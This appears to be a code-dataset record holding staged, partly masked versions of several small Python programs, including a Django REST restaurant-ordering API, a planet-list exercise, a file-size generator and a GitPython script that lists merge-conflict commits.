"step-4": "<mask token>\n\n\nclass CuisineViewSet(ModelViewSet):\n serializer_class = CuisineSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Cuisine.objects.all()\n\n\nclass MealTypeViewSet(ModelViewSet):\n permission_classes = [my_perms.IsAdminOrReadOnly]\n serializer_class = MealTypeSerializer\n queryset = MealType.objects.all()\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'get_types_with_menus':\n serializer_class = MealTypesWithMenuSerializer\n kwargs['context'] = self.get_serializer_context()\n return serializer_class(*args, **kwargs)\n return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)\n\n @action(['get'], detail=False, url_path='type-with-menus')\n def get_types_with_menus(self, request, *args, **kwargs):\n types = self.get_queryset().filter(menus__offered_by=request.\n query_params.get('restaurant', 0))\n types = self.get_serializer(types, many=True).data\n return Response(types)\n\n\nclass RestaurantTypeViewSet(ModelViewSet):\n serializer_class = RestaurantTypeSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = RestaurantType.objects.all()\n\n\nclass RestaurantViewSet(ModelViewSet):\n serializer_class = RestaurantSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Restaurant.objects.all()\n\n def _get_recommended_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))\n return recommended\n\n def _get_special_restaurants(self) ->queryset:\n queryset = self.get_queryset()\n special_offers_restaurants = queryset.filter(Q(menus__discount__gt=\n 0) | Q(on_special_day=True))\n return special_offers_restaurants\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n recommended = self._get_recommended_restaurants().order_by('?')[:5]\n special = self._get_special_restaurants().order_by('?')[:5]\n all_restaurants = 
self.get_queryset().order_by('?')[:5]\n recommended = self.get_serializer(recommended, many=True).data\n special = self.get_serializer(special, many=True).data\n all_restaurants = self.get_serializer(all_restaurants, many=True).data\n response = {'recommended': recommended, 'special': special, 'all':\n all_restaurants}\n return Response(response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_special_restaurants().\n order_by('-created_at'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_recommended_restaurants(\n ).order_by('-rates_avg'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=True, url_path='restaurant-menus')\n def get_restaurant_menus(self, request, *args, **kwargs):\n categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(\n restaurant_id=self.kwargs.get('pk'))\n return Response(categorized_menus)\n\n\nclass MenuViewSet(ModelViewSet):\n serializer_class = MenuSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Menu.objects.all()\n\n @action(['get'], detail=False, url_path='get-home')\n def home(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]\n recommended = queryset.all().order_by('?')[:5]\n special_offers = self.get_serializer(special_offers, many=True).data\n recommended = self.get_serializer(recommended, many=True).data\n response = {'recommended': recommended, 'special_offers':\n special_offers}\n return Response(data=response)\n\n @action(['get'], detail=False, url_path='special-offers')\n def special_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = 
queryset.filter(~Q(discount=0)).order_by('-created_at'\n )\n serializer = self.get_serializer(special_offers, many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path='recommended-offers')\n def recommended_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n recommended = queryset.all().order_by('-created_at')\n serializer = self.get_serializer(recommended, many=True)\n return Response(serializer.data)\n\n\nclass OrderViewSet(ModelViewSet):\n serializer_class = OrderWRestaurantSerializer\n permission_classes = [permissions.IsAuthenticated]\n queryset = Order.objects.all().order_by('-created_at')\n\n def get_serializer(self, *args, **kwargs):\n if self.action == 'create':\n return OrderSerializer(*args, **kwargs)\n return super(OrderViewSet, self).get_serializer(*args, **kwargs)\n\n def get_queryset(self):\n return super(OrderViewSet, self).get_queryset().filter(client=self.\n request.user.client)\n\n def create(self, request, *args, **kwargs):\n fixer = RequestDataFixer(request=request)\n return super(OrderViewSet, self).create(fixer, *args, **kwargs)\n\n\nclass OrderLineViewSet(ModelViewSet):\n serializer_class = OrderLineSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = OrderLine.objects.all()\n\n\nclass WilayaViewSet(ModelViewSet):\n serializer_class = WilayaSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Wilaya.objects.all()\n\n\nclass CityViewSet(ModelViewSet):\n serializer_class = CitySerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = City.objects.all()\n\n\n<mask token>\n\n\nclass AddressViewSet(ModelViewSet):\n serializer_class = AddressSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Address.objects.all()\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n 
instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.\n user.client).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(belongs_to=request.user.client).update(\n default=False)\n return Response({'status': True})\n\n def get_queryset(self):\n return super(AddressViewSet, self).get_queryset().filter(belongs_to\n =self.request.user.client)\n\n\nclass PhoneViewSet(ModelViewSet):\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n serializer_class = PhoneSerializer\n queryset = Phone.objects.all()\n\n @action(['PUT'], detail=False, url_path='set-main', url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(user=request.user).update(default=False)\n return Response({'status': True})\n\n @action(['PUT'], detail=True, url_path='set-default', url_name=\n 'set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), user=request.user\n ).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n def get_queryset(self):\n return self.get_queryset().filter(user=self.request.user)\n",
"step-5": "from django.db.models import Q, Avg\nfrom django.http import JsonResponse\nfrom rest_framework import permissions\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom base_backend import permissions as my_perms\nfrom base_backend.utils import RequestDataFixer\nfrom restaurants.models import User, Cuisine, MealType, AppVersion, RestaurantType, Restaurant, Menu, Order, OrderLine, \\\n Wilaya, City, Address, Phone\nfrom restaurants.serializers import UserSerializer, SmsConfirmationSerializer, CuisineSerializer, \\\n RestaurantTypeSerializer, RestaurantSerializer, MenuSerializer, OrderLineSerializer, WilayaSerializer, \\\n CitySerializer, OrderWRestaurantSerializer, MealTypesWithMenuSerializer, MealTypeSerializer, OrderSerializer, \\\n AddressSerializer, PhoneSerializer\n\n\nclass LoginApi(ObtainAuthToken):\n def post(self, request, *args, **kwargs):\n serializer = self.serializer_class(data=request.data,\n context=dict(request=request))\n serializer.is_valid(raise_exception=True)\n user = serializer.validated_data['user']\n token, created = Token.objects.get_or_create(user=user)\n\n return Response(\n dict(\n token=token.key,\n user_id=user.pk,\n phone=user.phone,\n email=user.email,\n type=user.user_type,\n photo=user.photo.url if user.photo else None,\n address=user.address,\n city=user.lives_in_id,\n birth_date=user.birth_date,\n username=user.username,\n # is_participant=user.client.is_participant if user.client is not None else None,\n # participant_id=user.client.participant.participant_id if user.client else None,\n )\n )\n\n\nclass UserViewSet(ModelViewSet):\n serializer_class = UserSerializer\n queryset = User.objects.filter(is_active=True)\n\n def get_permissions(self):\n if self.action == 'create' or 
self.action == 'register':\n return [permissions.AllowAny()]\n else:\n return [permissions.IsAuthenticatedOrReadOnly()]\n\n @action(methods=['post'], detail=False, url_path='register', permission_classes=[permissions.AllowAny()])\n def register(self, request, *args, **kwargs):\n response = super().create(request, *args, **kwargs)\n if response:\n response.data = dict(status=True, code=4)\n return response\n\n def create(self, request, *args, **kwargs):\n return self.register(request, *args, **kwargs)\n\n\nclass OtpApi(APIView):\n permission_classes = [permissions.AllowAny]\n\n def get(self, request):\n serializer = SmsConfirmationSerializer(data=request.GET)\n result = serializer.resend()\n if result:\n response = dict(status=True, code=5)\n else:\n response = dict(status=False, code=21)\n return Response(response)\n\n def put(self, request):\n serializer = SmsConfirmationSerializer(data=request.data)\n result = serializer.activate()\n if result:\n response = dict(status=True, code=5)\n else:\n response = dict(status=False, code=20)\n return Response(response)\n\n\nclass CuisineViewSet(ModelViewSet):\n serializer_class = CuisineSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Cuisine.objects.all()\n\n\nclass MealTypeViewSet(ModelViewSet):\n permission_classes = [my_perms.IsAdminOrReadOnly]\n serializer_class = MealTypeSerializer\n queryset = MealType.objects.all()\n\n def get_serializer(self, *args, **kwargs):\n if self.action == \"get_types_with_menus\":\n serializer_class = MealTypesWithMenuSerializer\n kwargs['context'] = self.get_serializer_context()\n return serializer_class(*args, **kwargs)\n return super(MealTypeViewSet, self).get_serializer(*args, **kwargs)\n\n @action(['get'], detail=False, url_path=\"type-with-menus\", )\n def get_types_with_menus(self, request, *args, **kwargs):\n types = self.get_queryset().filter(menus__offered_by=request.query_params.get('restaurant', 0))\n types = self.get_serializer(types, 
many=True).data\n return Response(types)\n\n\nclass RestaurantTypeViewSet(ModelViewSet):\n serializer_class = RestaurantTypeSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = RestaurantType.objects.all()\n\n\nclass RestaurantViewSet(ModelViewSet):\n serializer_class = RestaurantSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Restaurant.objects.all()\n\n def _get_recommended_restaurants(self) -> queryset:\n queryset = self.get_queryset()\n recommended = queryset.all().annotate(rates_avg=Avg('rates__stars'))\n return recommended\n\n def _get_special_restaurants(self) -> queryset:\n queryset = self.get_queryset()\n special_offers_restaurants = queryset.filter(Q(menus__discount__gt=0) | Q(on_special_day=True))\n return special_offers_restaurants\n\n @action(['get'], detail=False, url_path=\"get-home\")\n def home(self, request, *args, **kwargs):\n recommended = self._get_recommended_restaurants().order_by('?')[:5]\n special = self._get_special_restaurants().order_by('?')[:5]\n all_restaurants = self.get_queryset().order_by('?')[:5]\n recommended = self.get_serializer(recommended, many=True).data\n special = self.get_serializer(special, many=True).data\n all_restaurants = self.get_serializer(all_restaurants, many=True).data\n response = {\n 'recommended': recommended,\n 'special': special,\n 'all': all_restaurants\n }\n return Response(response)\n\n @action(['get'], detail=False, url_path=\"special-offers\")\n def special_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_special_restaurants().order_by('-created_at'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path=\"recommended-offers\")\n def recommended_offers(self, request, *args, **kwargs):\n serializer = self.get_serializer(self._get_recommended_restaurants().order_by('-rates_avg'), many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=True, 
url_path=\"restaurant-menus\")\n def get_restaurant_menus(self, request, *args, **kwargs):\n categorized_menus = Menu.objects.grouped_by_meal_type_for_a_restaurant(restaurant_id=self.kwargs.get('pk'))\n return Response(categorized_menus)\n\n\nclass MenuViewSet(ModelViewSet):\n serializer_class = MenuSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Menu.objects.all()\n\n @action(['get'], detail=False, url_path=\"get-home\")\n def home(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('?')[:5]\n recommended = queryset.all().order_by('?')[:5]\n special_offers = self.get_serializer(special_offers, many=True).data\n recommended = self.get_serializer(recommended, many=True).data\n response = {\n 'recommended': recommended,\n 'special_offers': special_offers\n }\n return Response(data=response)\n\n @action(['get'], detail=False, url_path=\"special-offers\")\n def special_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n special_offers = queryset.filter(~Q(discount=0)).order_by('-created_at')\n serializer = self.get_serializer(special_offers, many=True)\n return Response(serializer.data)\n\n @action(['get'], detail=False, url_path=\"recommended-offers\")\n def recommended_offers(self, request, *args, **kwargs):\n queryset = self.get_queryset()\n recommended = queryset.all().order_by('-created_at')\n serializer = self.get_serializer(recommended, many=True)\n return Response(serializer.data)\n\n\nclass OrderViewSet(ModelViewSet):\n serializer_class = OrderWRestaurantSerializer\n permission_classes = [permissions.IsAuthenticated]\n queryset = Order.objects.all().order_by('-created_at')\n\n def get_serializer(self, *args, **kwargs):\n if self.action == \"create\":\n return OrderSerializer(*args, **kwargs)\n return super(OrderViewSet, self).get_serializer(*args, **kwargs)\n\n def get_queryset(self):\n return super(OrderViewSet, 
self).get_queryset().filter(client=self.request.user.client)\n\n def create(self, request, *args, **kwargs):\n fixer = RequestDataFixer(request=request)\n return super(OrderViewSet, self).create(fixer, *args, **kwargs)\n\n\nclass OrderLineViewSet(ModelViewSet):\n serializer_class = OrderLineSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = OrderLine.objects.all()\n\n\nclass WilayaViewSet(ModelViewSet):\n serializer_class = WilayaSerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = Wilaya.objects.all()\n\n\nclass CityViewSet(ModelViewSet):\n serializer_class = CitySerializer\n permission_classes = [my_perms.IsAdminOrReadOnly]\n queryset = City.objects.all()\n\n\ndef version(request):\n print('inside this')\n if request.GET.get('code', None):\n code = request.GET.get('code')\n AppVersion.objects.all().update(code=code)\n return JsonResponse({'updated': True})\n else:\n code = AppVersion.objects.all().first().code\n return JsonResponse({'code': code})\n\n\nclass AddressViewSet(ModelViewSet):\n serializer_class = AddressSerializer\n permission_classes = [permissions.IsAuthenticatedOrReadOnly]\n queryset = Address.objects.all()\n\n @action(['PUT'], detail=True, url_path=\"set-default\", url_name='set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), belongs_to=request.user.client).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n @action(['PUT'], detail=False, url_path=\"set-main\", url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(belongs_to=request.user.client).update(default=False)\n return Response({\"status\": True})\n\n def get_queryset(self):\n return super(AddressViewSet, self).get_queryset().filter(belongs_to=self.request.user.client)\n\n\nclass PhoneViewSet(ModelViewSet):\n permission_classes 
= [permissions.IsAuthenticatedOrReadOnly]\n serializer_class = PhoneSerializer\n queryset = Phone.objects.all()\n\n @action(['PUT'], detail=False, url_path=\"set-main\", url_name='set-main')\n def set_main(self, request, *args, **kwargs):\n self.get_queryset().filter(user=request.user).update(default=False)\n return Response({\"status\": True})\n\n @action(['PUT'], detail=True, url_path=\"set-default\", url_name='set-default')\n def set_default(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.default = True\n instance.save()\n self.get_queryset().filter(~Q(pk=instance.pk), user=request.user).update(default=False)\n return Response(self.get_serializer(instance).data)\n\n def get_queryset(self):\n return self.get_queryset().filter(user=self.request.user)\n",
"step-ids": [
34,
40,
41,
42,
56
]
}
|
[
34,
40,
41,
42,
56
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
planet_list.append('Jupiter')
planet_list.append('Saturn')
planet_list.extend(['Uranus', 'Neptune'])
planet_list.insert(1, 'Earth')
planet_list.insert(1, 'Venus')
planet_list.append('Pluto')
del planet_list[-1]
print(planet_list)
<|reserved_special_token_1|>
# Start with two planets, then grow the list into the full solar system.
planet_list = ['Mercury', 'Mars']
# Add the remaining giants: two individually, the last two in bulk.
for giant in ('Jupiter', 'Saturn'):
    planet_list.append(giant)
planet_list += ['Uranus', 'Neptune']
# Each insert(1, ...) slots directly after Mercury, so Venus ends up
# before Earth in the final ordering.
planet_list.insert(1, 'Earth')
planet_list.insert(1, 'Venus')
# Pluto is appended and immediately dropped (demoted to dwarf planet).
planet_list.append('Pluto')
planet_list.pop()
print(planet_list)
<|reserved_special_token_1|>
# Seed the list with two planets (order matters for the inserts below).
planet_list = ["Mercury", "Mars"]
# Append the outer planets: two individually, the last two in one call.
planet_list.append("Jupiter")
planet_list.append("Saturn")
planet_list.extend(["Uranus", "Neptune"])
# insert(1, ...) pushes each new planet directly after Mercury, so Venus
# ends up before Earth in the final ordering.
planet_list.insert(1, "Earth")
planet_list.insert(1, "Venus")
# Pluto is appended and then removed again (no longer a planet).
planet_list.append("Pluto")
del planet_list[-1]
print(planet_list)
|
flexible
|
{
"blob_id": "1280ab66b817011e22e560a78104bbc4340989e7",
"index": 8495,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nplanet_list.append('Jupiter')\nplanet_list.append('Saturn')\nplanet_list.extend(['Uranus', 'Neptune'])\nplanet_list.insert(1, 'Earth')\nplanet_list.insert(1, 'Venus')\nplanet_list.append('Pluto')\ndel planet_list[-1]\nprint(planet_list)\n",
"step-3": "planet_list = ['Mercury', 'Mars']\nplanet_list.append('Jupiter')\nplanet_list.append('Saturn')\nplanet_list.extend(['Uranus', 'Neptune'])\nplanet_list.insert(1, 'Earth')\nplanet_list.insert(1, 'Venus')\nplanet_list.append('Pluto')\ndel planet_list[-1]\nprint(planet_list)\n",
"step-4": "planet_list = [\"Mercury\", \"Mars\"]\n\nplanet_list.append(\"Jupiter\")\nplanet_list.append(\"Saturn\")\nplanet_list.extend([\"Uranus\", \"Neptune\"])\nplanet_list.insert(1, \"Earth\")\nplanet_list.insert(1, \"Venus\")\nplanet_list.append(\"Pluto\")\ndel planet_list[-1]\n\nprint(planet_list)",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
from .dataset_readers import *
from .models import *
|
flexible
|
{
"blob_id": "bc8bf06f1adedeb7b364308591bff09ac42d6c29",
"index": 3702,
"step-1": "<mask token>\n",
"step-2": "from .dataset_readers import *\nfrom .models import *\n",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
import os
import glob
# Bytes per kilobyte; size thresholds below are given in KB.
ONE_KB = 1024


def get_files(dirname, size_in_kb):
    """Yield full paths of files under *dirname* that are >= size_in_kb KB.

    Walks the whole tree rooted at dirname. The original version compared
    int(filename) against the byte threshold — i.e. it tested the file's
    *name*, not its size (and crashed on non-numeric names) — and yielded
    bare basenames that callers could not stat. This version checks the
    actual on-disk size and yields usable paths.
    """
    for root, _, files in os.walk(dirname):
        for name in files:
            path = os.path.join(root, name)
            if os.path.getsize(path) >= size_in_kb * ONE_KB:
                yield path
# Pybites solution
def get_files1(dirname, size_in_kb):
    """Return files in dirname that are >= size_in_kb"""
    # Only inspects direct children of dirname: glob "*" is non-recursive
    # (and skips dotfiles). Yields full paths, one at a time.
    for file in glob.glob(os.path.join(dirname, "*")):
        # st_size is in bytes; scale the KB threshold to match.
        if os.stat(file).st_size >= size_in_kb * ONE_KB:
            yield file
|
normal
|
{
"blob_id": "0dec0f04cfe891eea74ef45484fa7433e3429dcd",
"index": 7570,
"step-1": "<mask token>\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-2": "<mask token>\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (filename for _, _, files in os.walk(dirname) for filename in\n files if int(filename) >= size_in_kb * ONE_KB)\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-3": "<mask token>\nONE_KB = 1024\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (filename for _, _, files in os.walk(dirname) for filename in\n files if int(filename) >= size_in_kb * ONE_KB)\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-4": "import os\nimport glob\nONE_KB = 1024\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (filename for _, _, files in os.walk(dirname) for filename in\n files if int(filename) >= size_in_kb * ONE_KB)\n\n\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, '*')):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-5": "import os\nimport glob\n\nONE_KB = 1024\n\n\ndef get_files(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n return (\n filename\n for _, _, files in os.walk(dirname)\n for filename in files\n if int(filename) >= size_in_kb * ONE_KB\n )\n\n\n# Pybites solution\ndef get_files1(dirname, size_in_kb):\n \"\"\"Return files in dirname that are >= size_in_kb\"\"\"\n for file in glob.glob(os.path.join(dirname, \"*\")):\n if os.stat(file).st_size >= size_in_kb * ONE_KB:\n yield file\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
class CommitAnalyzer:
<|reserved_special_token_0|>
def __init__(self, repo_path):
self.repo_path = repo_path
self.repo = Repo(self.repo_path)
assert not self.repo.bare
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CommitAnalyzer:
"""
Takes path of the repo
"""
def __init__(self, repo_path):
self.repo_path = repo_path
self.repo = Repo(self.repo_path)
assert not self.repo.bare
def get_conflict_commits(self):
conflict_commits = []
current_date = datetime.now()
for commit in self.repo.iter_commits('master'):
parents = commit.parents
if len(parents) > 1 and 'conflict' in commit.message.lower(
) and '.java' in commit.message.lower():
conflict_commits.append(commit)
return conflict_commits
<|reserved_special_token_0|>
for commit in commit_analyzer.get_conflict_commits():
print(commit, time.asctime(time.gmtime(commit.committed_date)))
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class CommitAnalyzer:
"""
Takes path of the repo
"""
def __init__(self, repo_path):
self.repo_path = repo_path
self.repo = Repo(self.repo_path)
assert not self.repo.bare
def get_conflict_commits(self):
conflict_commits = []
current_date = datetime.now()
for commit in self.repo.iter_commits('master'):
parents = commit.parents
if len(parents) > 1 and 'conflict' in commit.message.lower(
) and '.java' in commit.message.lower():
conflict_commits.append(commit)
return conflict_commits
commit_analyzer = CommitAnalyzer(os.getcwd())
for commit in commit_analyzer.get_conflict_commits():
print(commit, time.asctime(time.gmtime(commit.committed_date)))
<|reserved_special_token_1|>
import os
import time
from datetime import datetime, timedelta
from git import Repo
class CommitAnalyzer:
    """Inspect the commit history of a local git repository.

    Takes the path of the repo; the path must point at a non-bare clone
    (the assert below enforces that).
    """

    def __init__(self, repo_path):
        self.repo_path = repo_path
        self.repo = Repo(self.repo_path)
        # Bare repos have no working tree; this tool expects a clone.
        assert not self.repo.bare

    def get_conflict_commits(self):
        """Return merge commits on 'master' that mention a .java conflict.

        A commit with more than one parent is a merge; the message check is
        a heuristic for conflict resolutions involving Java files.
        """
        conflict_commits = []
        for commit in self.repo.iter_commits('master'):
            # Lower-case the message once instead of per substring test.
            message = commit.message.lower()
            if len(commit.parents) > 1 and 'conflict' in message and '.java' in message:
                conflict_commits.append(commit)
        return conflict_commits
# Run from inside a cloned repo: analyze the current working directory.
commit_analyzer = CommitAnalyzer(os.getcwd())
for commit in commit_analyzer.get_conflict_commits():
    # committed_date is a Unix timestamp; asctime(gmtime(...)) renders it in UTC.
    print(commit, time.asctime(time.gmtime(commit.committed_date)))
<|reserved_special_token_1|>
import os
import time
from datetime import datetime, timedelta
from git import Repo
class CommitAnalyzer():
"""
Takes path of the repo
"""
def __init__(self, repo_path):
self.repo_path = repo_path
self.repo = Repo(self.repo_path)
assert not self.repo.bare
def get_conflict_commits(self):
conflict_commits = []
current_date = datetime.now()
for commit in self.repo.iter_commits('master'):
parents = commit.parents
if len(parents) > 1 and "conflict" in commit.message.lower() and ".java" in commit.message.lower():
#if datetime.fromtimestamp(commit.committed_date) >= current_date - timedelta(5):
conflict_commits.append(commit)
return conflict_commits
#run script in cloned repo
commit_analyzer = CommitAnalyzer(os.getcwd())
for commit in commit_analyzer.get_conflict_commits():
print (commit, time.asctime(time.gmtime(commit.committed_date)))
|
flexible
|
{
"blob_id": "8479c70fed36dc6f1e6094c832fb22d8c2e53e3a",
"index": 920,
"step-1": "<mask token>\n\n\nclass CommitAnalyzer:\n <mask token>\n\n def __init__(self, repo_path):\n self.repo_path = repo_path\n self.repo = Repo(self.repo_path)\n assert not self.repo.bare\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CommitAnalyzer:\n \"\"\"\n\tTakes path of the repo\n\t\"\"\"\n\n def __init__(self, repo_path):\n self.repo_path = repo_path\n self.repo = Repo(self.repo_path)\n assert not self.repo.bare\n\n def get_conflict_commits(self):\n conflict_commits = []\n current_date = datetime.now()\n for commit in self.repo.iter_commits('master'):\n parents = commit.parents\n if len(parents) > 1 and 'conflict' in commit.message.lower(\n ) and '.java' in commit.message.lower():\n conflict_commits.append(commit)\n return conflict_commits\n\n\n<mask token>\nfor commit in commit_analyzer.get_conflict_commits():\n print(commit, time.asctime(time.gmtime(commit.committed_date)))\n",
"step-3": "<mask token>\n\n\nclass CommitAnalyzer:\n \"\"\"\n\tTakes path of the repo\n\t\"\"\"\n\n def __init__(self, repo_path):\n self.repo_path = repo_path\n self.repo = Repo(self.repo_path)\n assert not self.repo.bare\n\n def get_conflict_commits(self):\n conflict_commits = []\n current_date = datetime.now()\n for commit in self.repo.iter_commits('master'):\n parents = commit.parents\n if len(parents) > 1 and 'conflict' in commit.message.lower(\n ) and '.java' in commit.message.lower():\n conflict_commits.append(commit)\n return conflict_commits\n\n\ncommit_analyzer = CommitAnalyzer(os.getcwd())\nfor commit in commit_analyzer.get_conflict_commits():\n print(commit, time.asctime(time.gmtime(commit.committed_date)))\n",
"step-4": "import os\nimport time\nfrom datetime import datetime, timedelta\nfrom git import Repo\n\n\nclass CommitAnalyzer:\n \"\"\"\n\tTakes path of the repo\n\t\"\"\"\n\n def __init__(self, repo_path):\n self.repo_path = repo_path\n self.repo = Repo(self.repo_path)\n assert not self.repo.bare\n\n def get_conflict_commits(self):\n conflict_commits = []\n current_date = datetime.now()\n for commit in self.repo.iter_commits('master'):\n parents = commit.parents\n if len(parents) > 1 and 'conflict' in commit.message.lower(\n ) and '.java' in commit.message.lower():\n conflict_commits.append(commit)\n return conflict_commits\n\n\ncommit_analyzer = CommitAnalyzer(os.getcwd())\nfor commit in commit_analyzer.get_conflict_commits():\n print(commit, time.asctime(time.gmtime(commit.committed_date)))\n",
"step-5": "import os\nimport time\nfrom datetime import datetime, timedelta\nfrom git import Repo\n\nclass CommitAnalyzer():\n\n\t\"\"\"\n\tTakes path of the repo\n\t\"\"\"\n\tdef __init__(self, repo_path):\n\t\tself.repo_path = repo_path\n\t\tself.repo = Repo(self.repo_path)\n\t\tassert not self.repo.bare\n\n\tdef get_conflict_commits(self):\n\t\tconflict_commits = []\n\t\tcurrent_date = datetime.now()\n\t\tfor commit in self.repo.iter_commits('master'):\n\t\t\tparents = commit.parents\n\t\t\tif len(parents) > 1 and \"conflict\" in commit.message.lower() and \".java\" in commit.message.lower():\n\t\t\t\t#if datetime.fromtimestamp(commit.committed_date) >= current_date - timedelta(5):\n\t\t\t\tconflict_commits.append(commit)\n\n\t\treturn conflict_commits\n\n#run script in cloned repo\ncommit_analyzer = CommitAnalyzer(os.getcwd())\nfor commit in commit_analyzer.get_conflict_commits():\n\tprint (commit, time.asctime(time.gmtime(commit.committed_date)))",
"step-ids": [
2,
5,
6,
7,
8
]
}
|
[
2,
5,
6,
7,
8
] |
#Exercise 2 - Write a Python class which has two methods get_String and print_String. get_String accept a string
#from the user and print_String print the string in upper case
#string will be an input to a get_string method and whatever you put in will print when you make the print screen method
class IOString():
    """Store a user-supplied string and print it back in upper case."""

    def __init__(self):
        # Empty until get_String() captures a line of input.
        self.str1 = ""

    def get_String(self):
        """Read one line from standard input and remember it."""
        self.str1 = input()

    def print_String(self):
        """Print the remembered string converted to upper case."""
        text = self.str1
        print(text.upper())
# Demo: prompt the user for a line, then echo it back upper-cased.
# NOTE: runs at import time and blocks on input().
str1 = IOString()
str1.get_String()
str1.print_String()
|
normal
|
{
"blob_id": "cf2973b94f1113013fe9baa946202ec75488f7d2",
"index": 9697,
"step-1": "class IOString:\n <mask token>\n\n def get_String(self):\n self.str1 = input()\n <mask token>\n\n\n<mask token>\n",
"step-2": "class IOString:\n <mask token>\n\n def get_String(self):\n self.str1 = input()\n\n def print_String(self):\n print(self.str1.upper())\n\n\n<mask token>\n",
"step-3": "class IOString:\n\n def __init__(self):\n self.str1 = ''\n\n def get_String(self):\n self.str1 = input()\n\n def print_String(self):\n print(self.str1.upper())\n\n\n<mask token>\n",
